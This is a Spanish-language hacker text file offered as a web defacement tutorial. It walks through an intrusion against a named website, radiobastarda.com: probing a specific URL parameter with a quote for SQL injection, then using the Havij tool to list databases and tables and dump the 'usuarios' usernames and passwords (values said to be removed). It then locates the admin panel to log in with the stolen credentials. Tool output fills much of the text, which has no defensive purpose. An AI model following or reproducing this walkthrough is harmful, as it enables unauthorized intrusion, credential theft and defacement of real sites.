________________________________________________________________________
+++++++++++++++++++++++++ºº_.TUTORIAL._ºº+++++++++++++++++++++++++++++++
+++++++++++++++++++++++++ºººººººººººººººº+++++++++++++++++++++++++++++++
++++++++ ___ _ _____ ++++++++
++++++++| _`\ (_ ) (_ _)_ ++++++++
++++++++| (_) ) __ _ _ | | | | (_) ___ ___ __ ++++++++
++++++++| , / /'__`\ /'_` ) | | | | | |/' _ ` _ `\ /'__`\++++++++
++++++++| |\ \ ( ___/( (_| | | | | | | || ( ) ( ) |( ___/++++++++
++++++++(_) (_)`\____)`\__,_)(___) (_) (_)(_) (_) (_)`\____)++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++He decidido retirarme... me pondré a jugar Ragnarok..y tibia también, así que no tengo tiempo para dumps D:
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Así que aquí les va un ultimo filtrado de datos :) les enseñare también como buscarlos..)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Hola a todos y bienvenidos a un tutorial de web deface.
Para esto, usare la web Radio Bastarda para enseñarles....
nos metemos a radiobastarda y buscamos donde podemos encontrar una vulnerabilidad... yo encontré esta: http://radiobastarda.com/verNoticiaBastarda.php?idNoticia=113 , como lo se? porque hice esto: http://radiobastarda.com/verNoticiaBastarda.php?idNoticia='113 (podran ver que esta llena de vulnerabilidades xD)
Una vez que tenemos la url con vul procedemos a usar el programa "havij"... ponemos la url (http://radiobastarda.com/verNoticiaBastarda.php?idNoticia=113) en el target y le damos a analyce
Esperamos.....
esperamos.....
Vemos que nos da esta info:
Host IP: 95.211.110.117
Web Server: Apache/2
Powered-by: PHP/5.2.12
Finding Keyword...
+++++++++++++++++++
por mientras.. :D
+++++++++++++++++++
hay vemos que encontró la db:
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 4
Valid String Column is 2
Current DB: radiobas_db
++++++++++++++++++++++
ahora procedemos a hacer click en tables y después en get tables...
----------------------
fue bastante rápido.. :)
podemos ver que el programa nos dice esto:
Tables found: bastardes,comentario,comentariopublicacion,conductor,etiquetas,etiquetaspublicacion,lamento,noticia,programa,recomendacion,reportaje,usuarios
Lo que nos interesa es tabla "usuarios". Marcamos la tabla y le damos en get collumns
Bueno: Columns found: idUsuario,usuario,password
marcamos usuario, password.
y le damos en get data
Ahora miramos el tesoro (para ti, que es tu primera intrusión en una web ;) )
Count(*) of radiobas_db.usuarios is 8
Data Found: usuario,password=AQUI VA LOS USUARIOS Y PASS
Data Found: usuario,password=Los borre
Data Found: usuario,password=para que no se te haga tan facil
Data Found: usuario,password=cuando hagas el paso anterior los veras en el rpograma havij ;)
Data Found: usuario,password=
Data Found: usuario,password=
Data Found: usuario,password=
Data Found: usuario,password=
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Muy bien, ahora lo que haremos es hacer click en find admin (para encontrar donde cresta poner los datos que sacaste ahora!)
Miren, las dos primeros links nos interesan. uno dice http://asdasda.cl/ (ejemplo) y dice "200 ok". funciona pero la que dice 302 found es la que sirve..
ahora solo queda ingresar datos y LISTO!!
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Felicidades, terminaste el tutorial !:)
Gracias por leerlo también dx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
________________________________________________________________________
+++++++++++++++++++++++++ºº_.TUTORIAL._ºº+++++++++++++++++++++++++++++++
+++++++++++++++++++++++++ºººººººººººººººº+++++++++++++++++++++++++++++++
++++++++ ___ _ _____ ++++++++
++++++++| _`\ (_ ) (_ _)_ ++++++++
++++++++| (_) ) __ _ _ | | | | (_) ___ ___ __ ++++++++
++++++++| , / /'__`\ /'_` ) | | | | | |/' _ ` _ `\ /'__`\++++++++
++++++++| |\ \ ( ___/( (_| | | | | | | || ( ) ( ) |( ___/++++++++
++++++++(_) (_)`\____)`\__,_)(___) (_) (_)(_) (_) (_)`\____)++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Saludos, queridos wannabers :D
Saludos, queridos lammers :D
Saludos, queridos Scripter Kiddies :D
__________________________________________________________________________________________________